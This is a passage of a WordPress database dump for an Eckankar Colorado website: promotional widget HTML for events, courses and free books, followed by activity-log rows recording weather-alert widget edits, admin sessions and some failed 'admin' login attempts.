class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter wp-image-269300 size-full bg-img alignnone bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"alignnone wp-image-269326 size-full aligncenter bg-img bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"bg-img bg-img-square alignnone wp-image-269341 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 15px;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px; font-weight: 600;\" data-font-weight=\"600\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 15px; margin-bottom: 24px;\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 600;\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\" data-font-weight=\"600\">(Initiates Subscribe Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 15px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 15px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and<br>\r\n<strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(238278,40502,'_message_key','widget_edited'),(238279,40502,'_user_id','2'),(238280,40502,'_user_login','S8zhaBda'),(238281,40502,'_user_email','nada@zipnadanot.org'),(238282,40502,'_server_remote_addr','76.130.120.x'),(238283,40502,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(238284,40503,'widget_id_base','custom_html'),(238285,40503,'widget_name_translated','Custom HTML'),(238286,40503,'sidebar_id','null'),(238287,40503,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px; box-shadow: rgba(256, 256, 2, 0.2) 0px 2px 8px 0px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238288,40503,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px; box-shadow: rgba(256, 256, 256, 0.2) 0px 2px 8px 0px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238289,40503,'_message_key','widget_edited'),(238290,40503,'_user_id','2'),(238291,40503,'_user_login','S8zhaBda'),(238292,40503,'_user_email','nada@zipnadanot.org'),(238293,40503,'_server_remote_addr','76.130.120.x'),(238294,40503,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(238295,40504,'failed_username','admin'),(238296,40504,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'),(238297,40504,'_message_key','user_unknown_login_failed'),(238298,40504,'_server_remote_addr','23.97.205.x'),(238299,40505,'widget_id_base','custom_html'),(238300,40505,'widget_name_translated','Custom HTML'),(238301,40505,'sidebar_id','null'),(238302,40505,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px; box-shadow: rgba(256, 256, 256, 0.2) 0px 2px 8px 0px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238303,40505,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px; box-shadow: rgba(256, 256, 256, 0.2) 0px 2px 8px 0px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238304,40505,'_message_key','widget_edited'),(238305,40505,'_user_id','2'),(238306,40505,'_user_login','S8zhaBda'),(238307,40505,'_user_email','nada@zipnadanot.org'),(238308,40505,'_server_remote_addr','76.130.120.x'),(238309,40505,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(238310,40506,'_user_id','2'),(238311,40506,'_user_login','S8zhaBda'),(238312,40506,'_user_email','nada@zipnadanot.org'),(238313,40506,'_message_key','user_logged_out'),(238314,40506,'_server_remote_addr','76.130.120.x'),(238315,40506,'_server_http_referer','https://eckankar-colorado.org/wp-admin/themes.php?page=simple-custom-css.php'),(238316,40507,'failed_username','admin'),(238317,40507,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(238318,40507,'_message_key','user_unknown_login_failed'),(238319,40507,'_xmlrpc_request','true'),(238320,40507,'_server_remote_addr','20.38.46.x'),(238223,40497,'_message_key','widget_edited'),(238224,40497,'_user_id','2'),(238225,40497,'_user_login','S8zhaBda'),(238226,40497,'_user_email','nada@zipnadanot.org'),(238227,40497,'_server_remote_addr','76.130.120.x'),(238228,40497,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(238229,40498,'widget_id_base','custom_html'),(238230,40498,'widget_name_translated','Custom HTML'),(238231,40498,'sidebar_id','null'),(238232,40498,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px; box-shadow: rgba(25, 99, 99, 0.2) 0px 2px 8px 0px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238233,40498,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px; box-shadow: rgba(256, 99, 99, 0.2) 0px 2px 8px 0px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238234,40498,'_message_key','widget_edited'),(238235,40498,'_user_id','2'),(238236,40498,'_user_login','S8zhaBda'),(238237,40498,'_user_email','nada@zipnadanot.org'),(238238,40498,'_server_remote_addr','76.130.120.x'),(238239,40498,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(238240,40499,'widget_id_base','custom_html'),(238241,40499,'widget_name_translated','Custom HTML'),(238242,40499,'sidebar_id','null'),(238243,40499,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px; box-shadow: rgba(256, 99, 99, 0.2) 0px 2px 8px 0px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238244,40499,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px; box-shadow: rgba(256, 2, 99, 0.2) 0px 2px 8px 0px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather 